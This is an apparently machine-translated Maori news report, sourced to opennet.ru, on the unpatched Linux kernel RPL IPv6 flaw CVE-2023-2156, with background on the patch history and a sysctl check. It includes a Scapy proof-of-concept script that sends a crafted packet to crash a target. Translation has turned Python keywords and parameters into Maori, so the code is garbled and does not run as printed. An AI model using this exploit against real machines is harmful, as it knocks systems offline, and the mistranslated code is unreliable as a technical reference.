Kua puta nga korero mo te whakaraeraetanga (0-ra) kaore i whakatikahia (CVE-2023-2156) i roto i te kernel Linux, e taea ai te aukati i te punaha ma te tuku i nga paatete IPv6 (packet-of-death). Ka puta noa te raru ka whakahoehia te kawa RPL (Routing Protocol for Low-Power and Lossy Networks), ka monokia na te taunoa i roto i nga tohatoha ka whakamahia te nuinga ki runga i nga taputapu whakauru e mahi ana i roto i nga whatunga ahokore me te nui o te ngaronga paatete.
Ko te whakaraeraetanga ka puta mai i te he o te tukatuka o nga raraunga o waho i roto i te RPL kawa porotiti waehere, e arai atu ai ki te kore e kii, ka uru te pata ki roto i te ahua ohorere. I te whakatakoto i nga raraunga i puta mai i te parai i te pane pane paatete IPv6 RPL i roto i te hanganga k_buff (Socket Buffer), mena kua tautuhia te mara CmprI ki te 15, te mara Segleft ki te 1, me te CmprE ki te 0, ka whakahekehia te vector 48-paita me nga wahitau. ki te 528 paita ka puta he ahuatanga kaore e ranea te mahara kua tohatohahia mo te kaitarai. I tenei keehi, ko te mahi skb_push, i whakamahia hei pana i nga raraunga ki roto i te hanganga, ka arowhai mo te kore whakataurite i waenga i te rahi o te raraunga me te papaaru, ka whakaputa i te ahua ohorere ki te aukati i te tuhi i tua atu o te rohe aukati.
Tauira mahi: # Ka whakamahia e matou a Scapy ki te hanga i te kete mai i te scapy.all kawemai * kawemai turanga # Whakamahia te IPv6 mai i to atanga LAN DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # Ka whakamahi matou i nga turanga hei tuku i te kete sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # Hangaia te kete # Momo = 3 ka waiho tenei hei putea RPL # E 3 nga wahitau kei roto i nga wahitau, engari na te mea he 15 a CmprI, # ko ia octet o nga wahitau tuatahi e rua. ka waiho hei wāhitau kōpeke # Segleft = 1 hei whakaoho i te whakakaha # lastentry = 0xf0 ka whakatakoto CmprI ki te 15 me CmprE ki te 0 p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(momo=3, wāhitau=[“a8: :", "a7::", "a6::"], segleft=1, lastentry=0xf0) # Tukuna tenei kete kino sockfd.sendto(paita(p), (DST_ADDR, 0))
Ma te maarama i whakamohiohia nga kaiwhakawhanake kernel mo te whakaraeraetanga i te marama o Hanuere 2022 a i roto i nga marama 15 kua hipa kua toru nga wa ka ngana ratou ki te whakatika i te raru, ka tukuna nga papa i te marama o Hepetema 2022, Oketopa 2022 me Paenga-whawha 2023, engari i ia wa ka whakatikahia. kare i nui, kare hoki e taea te whakaraerae te whakaputa. I te mutunga, ko te kaupapa ZDI, nana i whakarite nga mahi ki te whakatika i te whakaraeraetanga, i whakatau ki te tuku korero taipitopito mo te whakaraeraetanga me te kore e tatari mo te whakatika mahi kia waatea i roto i te kernel.
No reira, kei te noho tonu te whakaraeraetanga. Ina koa, ko te papaki kei roto i te kernel 6.4-rc2 kaore i te whai hua. Ka tohutohuhia nga kaiwhakamahi ki te tirotiro kaore i te whakamahia te kawa RPL ki o raatau punaha, ka taea te whakamahi ma te whakahau sysctl -a | grep -i rpl_seg_enabled
Source: opennet.ru